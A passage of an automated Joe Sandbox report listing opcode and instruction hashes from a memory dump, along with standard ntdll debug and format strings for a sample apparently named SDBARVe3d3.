                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                    • Instruction ID: bedca41c6b970f819cfdf0e0a0088ef1d9dc70f7c8e305f2a3622cfb693376fa
                                                                                                                                    • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                    • Instruction Fuzzy Hash: 81E08C319406809BCF22DF59D644F4AFBB4BB84B00F150004E0085B264CA24A800CB40
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                    • Instruction ID: f42f154460297f27a3fa4f1e6794ea2db0c3414b807f70de5aca607e8d022ac0
                                                                                                                                    • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                    • Instruction Fuzzy Hash: 2DD022322130B193CB2856596904F63E915ABC0A90F1A006C340A93808C0088C42D2E0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                    • Instruction ID: 93a2ca660342b80205369f485a473ba640649d0bdd486155343277519afaaee6
                                                                                                                                    • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                    • Instruction Fuzzy Hash: 4DD012371D054DBBCB219F66DC01F957BA9E7A4BA0F444420B514875A1C63AE950D584
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9ca84bdc7ce9619f4a55d0dd5ef698cf07ce9e8de6a87aa844ddab0203b9a8f7
                                                                                                                                    • Instruction ID: 35699baf5041f521e87f2e440c011da16d1bf4ebad1990aad3838bfa3e11d843
                                                                                                                                    • Opcode Fuzzy Hash: 9ca84bdc7ce9619f4a55d0dd5ef698cf07ce9e8de6a87aa844ddab0203b9a8f7
                                                                                                                                    • Instruction Fuzzy Hash: E7D0A731501109CBDF27CF08C510E2EFA78FF20A41F50006CEB0051030E378ED01CA00
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                    • Instruction ID: 6c3991655045e4bce9ee4161ec9900442ba4524de228c90053e02e52355a2483
                                                                                                                                    • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                    • Instruction Fuzzy Hash: F5D0C935256E80CFD61BCB0CC5A4F15B3A8BB84B44F8104D0F402CBB22D66CD940CA00
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                    • Instruction ID: 0e32b51943ece1c2e8244a01b90d73fcaf6bc13fe0cf665c3abf4282aea1fbb9
                                                                                                                                    • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                    • Instruction Fuzzy Hash: 94C01232150644AFC7119A95CD01F0177A9E798B40F000421F20447571C535E810D644
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                    • Instruction ID: c040c1c995ea8c74d2756d216bfd520b6850d84bf7bb8be5e1f410fa7d5b39c2
                                                                                                                                    • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                    • Instruction Fuzzy Hash: 4BD01236100248EFCB01DF41C890D9ABB2AFBD8710F108019FD19076108A31ED62DA50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 44763e0d592189c74f5a6b63d82e26cd2e0dc1380e772b304b60e67e5e663533
                                                                                                                                    • Instruction ID: 2d8c70de2c4e6fd9f603f94b09dc5cc648541451a9338d66aa5e7007801324f7
                                                                                                                                    • Opcode Fuzzy Hash: 44763e0d592189c74f5a6b63d82e26cd2e0dc1380e772b304b60e67e5e663533
                                                                                                                                    • Instruction Fuzzy Hash: 7C90023120550403D6007158950C707400597D0201F56D431A0424568DD6568A516222
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: dedcaabe47d61ddfd30d284cdb48eac2440b0660ef4d3e2f0277392e5843bd55
                                                                                                                                    • Instruction ID: 88a58601332487e2cc11f22204d0e4de25c0b2b556fee5fef840dfd8f33e2298
                                                                                                                                    • Opcode Fuzzy Hash: dedcaabe47d61ddfd30d284cdb48eac2440b0660ef4d3e2f0277392e5843bd55
                                                                                                                                    • Instruction Fuzzy Hash: 8190022160950402D6407158941C706401597D0201F56D031A0024564DC6598B5567A2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 561d3d492f6e8922fc529cbb94a58303e774caa27d4e4fb07a454f9b97890453
                                                                                                                                    • Instruction ID: edd33cef6e60a76d43f340a3144c32e8386aeb73aa9904fb71a9acbc983858a1
                                                                                                                                    • Opcode Fuzzy Hash: 561d3d492f6e8922fc529cbb94a58303e774caa27d4e4fb07a454f9b97890453
                                                                                                                                    • Instruction Fuzzy Hash: 4B90023120550402D6007598940C646400597E0301F56D031A5024565EC6658A916232
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cae4173f32a435f7b3af3198df85c4fd58d47b9187bcd2ad99b11b4bf016335b
                                                                                                                                    • Instruction ID: 012a6eecdc388d8edb39fe489f768273fdac9bf558ef43055c4e1d0831f27bcc
                                                                                                                                    • Opcode Fuzzy Hash: cae4173f32a435f7b3af3198df85c4fd58d47b9187bcd2ad99b11b4bf016335b
                                                                                                                                    • Instruction Fuzzy Hash: 6F90026121550042D60471588408706404597E1201F56C032A2154564CC5298E615226
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8a220c1f6f2d7c5f23846e60bac3218f7c9e3531f99b45f12ae3c3628c8536cc
                                                                                                                                    • Instruction ID: 9f22fc71efeff72b544323e8badad9e092b7e1bb31142e2b8b79f91c8a381334
                                                                                                                                    • Opcode Fuzzy Hash: 8a220c1f6f2d7c5f23846e60bac3218f7c9e3531f99b45f12ae3c3628c8536cc
                                                                                                                                    • Instruction Fuzzy Hash: 6290026134550442D60071588418B064005D7E1301F56C035E1064564DC619CE526227
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cb79a41b8be069327481432c14c6ad5ac656fc5412ca9b3557ce7611ae72ab9d
                                                                                                                                    • Instruction ID: 2780cf273c5fc94c4fe614b103c12c95c624f9d3e9eabe41bc76b0d4db20d2a0
                                                                                                                                    • Opcode Fuzzy Hash: cb79a41b8be069327481432c14c6ad5ac656fc5412ca9b3557ce7611ae72ab9d
                                                                                                                                    • Instruction Fuzzy Hash: 66900221215D0042D70075688C18B07400597D0303F56C135A0154564CC9158A615622
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fe96358129029a32457201c11f509d61e30f30cfc08423a446c9abb56d6cf7ee
                                                                                                                                    • Instruction ID: b3f1194d3bf4a1e2d2d04ebc4ca49bb1f1975e576d4decc26ca21a78ca90354e
                                                                                                                                    • Opcode Fuzzy Hash: fe96358129029a32457201c11f509d61e30f30cfc08423a446c9abb56d6cf7ee
                                                                                                                                    • Instruction Fuzzy Hash: 949002216055004246407168C8489068005BBE1211B56C131A0998560DC5598A655766
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 49fda1b7858ce07dd1fbb255b9020c4775feedd59c29656db7909a9ae9e9a312
                                                                                                                                    • Instruction ID: ff4b3cca795d54c19a22a690eee36f76a5c662edfb669b98fc8b8a2b911d6e87
                                                                                                                                    • Opcode Fuzzy Hash: 49fda1b7858ce07dd1fbb255b9020c4775feedd59c29656db7909a9ae9e9a312
                                                                                                                                    • Instruction Fuzzy Hash: C590023120590402D6007158880C747400597D0302F56C031A5164565EC665CA916632
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6204da92fa82b0035802633367e8b46a14f48500a1f50bf981dbcf7a093ec256
                                                                                                                                    • Instruction ID: ab7329b6292be6b87681da3e7e720df5087802b5c3885cf251b62602723777ae
                                                                                                                                    • Opcode Fuzzy Hash: 6204da92fa82b0035802633367e8b46a14f48500a1f50bf981dbcf7a093ec256
                                                                                                                                    • Instruction Fuzzy Hash: E190023120590402D6007158881870B400597D0302F56C031A1164565DC6258A516672
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3d15182fe1a3845ca610bf64d393bf6b558e3a83c63c3914921992c72eead119
                                                                                                                                    • Instruction ID: d353c2043eebf6997b8417e0390370371823f9ad361d6e811f05e4b82a04cdb3
                                                                                                                                    • Opcode Fuzzy Hash: 3d15182fe1a3845ca610bf64d393bf6b558e3a83c63c3914921992c72eead119
                                                                                                                                    • Instruction Fuzzy Hash: 5790022130550402D602715884186064009D7D1345F96C032E1424565DC6258B53A233
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a93ab62af8e505f0104c5fb6a777dff61a822335fe0ea26b82b19fcc857590d7
                                                                                                                                    • Instruction ID: 82bd6962fb32a8bd1692ac26adcd46e509f36fbdec0e8e87e570926f84119f01
                                                                                                                                    • Opcode Fuzzy Hash: a93ab62af8e505f0104c5fb6a777dff61a822335fe0ea26b82b19fcc857590d7
                                                                                                                                    • Instruction Fuzzy Hash: FC90026120590403D64075588808607400597D0302F56C031A2064565ECA298E516236
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1b7fcd046201922cf43e1b08bb6b76ab1ff58a24c1ac305742eadc8775b803f7
                                                                                                                                    • Instruction ID: 4f6c544e1c9f4bc262954f19114bef7eff21486d5d7452fdcdf01c255ff79276
                                                                                                                                    • Opcode Fuzzy Hash: 1b7fcd046201922cf43e1b08bb6b76ab1ff58a24c1ac305742eadc8775b803f7
                                                                                                                                    • Instruction Fuzzy Hash: FC90027120550402D64071588408746400597D0301F56C031A5064564EC6598FD56766
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f327775d835165a68c501467aafc09c4bff2b985fec5efcd8f83c71dc7a4038b
                                                                                                                                    • Instruction ID: 5cec2eb2de273af7ef5c1b27adcc5ecc8f5f9795cd3ef70429dc22916a63c392
                                                                                                                                    • Opcode Fuzzy Hash: f327775d835165a68c501467aafc09c4bff2b985fec5efcd8f83c71dc7a4038b
                                                                                                                                    • Instruction Fuzzy Hash: 3690022160550502D60171588408616400A97D0241F96C032A1024565ECA258B92A232
                                                                                                                                    Memory Dump Source
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                    • Opcode ID: 0254376a9836a6fc6d798ddbb9bfe2ce9649f23f404270ac800f6820e902fb0c
                                                                                                                                    • Instruction ID: b1c81f082015e3e1ff10aa9068d89fecfdd11b82b8a53be36107d0e4522771e2
                                                                                                                                    • Opcode Fuzzy Hash: 0254376a9836a6fc6d798ddbb9bfe2ce9649f23f404270ac800f6820e902fb0c
                                                                                                                                    • Instruction Fuzzy Hash: 7F51D5B1B00216AFDF51DB9C8C9097EFBBCBB48240B14C169E965D7646D734DE04CBA0
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                    • Opcode ID: e434be150d1d5034ae9b426946a4487198b04ac5848658ae6d8fc0e594c479c2
                                                                                                                                    • Instruction ID: 2484f09295321102679f4ece7783770374025f08f51f0e7e7bec6b488a5b1c37
                                                                                                                                    • Opcode Fuzzy Hash: e434be150d1d5034ae9b426946a4487198b04ac5848658ae6d8fc0e594c479c2
                                                                                                                                    • Instruction Fuzzy Hash: D451F6B1A0064AAECB31DF5CC99097FFBF8EB44200B648899E997D7646E674DE018760
                                                                                                                                    Strings
                                                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017946FC
                                                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01794742
                                                                                                                                    • Execute=1, xrefs: 01794713
                                                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01794655
                                                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 01794787
                                                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01794725
                                                                                                                                    • ExecuteOptions, xrefs: 017946A0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                    • API String ID: 0-484625025
                                                                                                                                    • Opcode ID: 1da4f8b72122beb2543e649d482df790e5d0dc61435ea2332d9126a198b55d87
                                                                                                                                    • Instruction ID: c36553e278c428ac8b2bdb3c7bf9d8ce048224f4f87d58cf864866e6b4ab8ef9
                                                                                                                                    • Opcode Fuzzy Hash: 1da4f8b72122beb2543e649d482df790e5d0dc61435ea2332d9126a198b55d87
                                                                                                                                    • Instruction Fuzzy Hash: 75511B71600219AAEF15AAA8EC99FADF7ACEF14304F8400D9EA05A71C1D7B0DA45CF61
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldvrm
                                                                                                                                    • String ID: +$-$0$0
                                                                                                                                    • API String ID: 1302938615-699404926
                                                                                                                                    • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                    • Instruction ID: fc667bba44a4044465d3398c88dc1083ffdf979374424fc90857a48f389340eb
                                                                                                                                    • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                    • Instruction Fuzzy Hash: CC81A070F4524A9EEF258E6CC8917FEFBB9AF46320F18415ADD51E7291C73898408B91
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                    • String ID: %%%u$[$]:%u
                                                                                                                                    • API String ID: 48624451-2819853543
                                                                                                                                    • Opcode ID: 6c1e76bfc361b309b35f0d55fab752050962925252ed9f410fa94e8612ae5d7d
                                                                                                                                    • Instruction ID: 8c6c7795221a3f309ec49c41f5346410c9e0435daa3245c2ea01b1541b0e0358
                                                                                                                                    • Opcode Fuzzy Hash: 6c1e76bfc361b309b35f0d55fab752050962925252ed9f410fa94e8612ae5d7d
                                                                                                                                    • Instruction Fuzzy Hash: D921817AA0021DABDB11DE79CC44AAEFBF9AF54650F044116E915E3205E7319A028BA1
                                                                                                                                    Strings
                                                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017902BD
                                                                                                                                    • RTL: Re-Waiting, xrefs: 0179031E
                                                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017902E7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                    • API String ID: 0-2474120054
                                                                                                                                    • Opcode ID: 184d412b8d9b2b05e641a933c2db52f6428320f2cace16b946ddacaf1f66c80a
                                                                                                                                    • Instruction ID: 0398d7809a5c936a496418bf9516e0741106963cf7f255da7569b1e117a08df3
                                                                                                                                    • Opcode Fuzzy Hash: 184d412b8d9b2b05e641a933c2db52f6428320f2cace16b946ddacaf1f66c80a
                                                                                                                                    • Instruction Fuzzy Hash: E6E1AB716187419FEB25CF2CD884B2AFBE4AB84314F140A5DF5A5CB2E1D774D948CB42
                                                                                                                                    Strings
                                                                                                                                    • RTL: Resource at %p, xrefs: 01797B8E
                                                                                                                                    • RTL: Re-Waiting, xrefs: 01797BAC
                                                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01797B7F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                    • API String ID: 0-871070163
                                                                                                                                    • Opcode ID: b73db9e5875d0b868c59304b6010cef621bc701908d510ac43eea9d62b78625d
                                                                                                                                    • Instruction ID: 34376e181398082789d36b94b43678a357319e66b62b4c97609888c26fe7c05d
                                                                                                                                    • Opcode Fuzzy Hash: b73db9e5875d0b868c59304b6010cef621bc701908d510ac43eea9d62b78625d
                                                                                                                                    • Instruction Fuzzy Hash: 9B41D2317047029FDB25DE29D840B6AF7E6EF98710F100A1DFE5ADB680DBB1E9058B91
                                                                                                                                    APIs
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0179728C
                                                                                                                                    Strings
                                                                                                                                    • RTL: Resource at %p, xrefs: 017972A3
                                                                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01797294
                                                                                                                                    • RTL: Re-Waiting, xrefs: 017972C1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                    • API String ID: 885266447-605551621
                                                                                                                                    • Opcode ID: a0d34dd55dd3381ed20da8ad2ce97379d104de1433a61869d6e378bc15f0d536
                                                                                                                                    • Instruction ID: 41ccccec3631e508df0e5faae036b85c319b02d4541762d24077b5be8a1f0050
                                                                                                                                    • Opcode Fuzzy Hash: a0d34dd55dd3381ed20da8ad2ce97379d104de1433a61869d6e378bc15f0d536
                                                                                                                                    • Instruction Fuzzy Hash: 25411031614202ABCB25CE29DC81B6AFBA6FF94710F100658FD55AB280DB70E8068BD1
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___swprintf_l
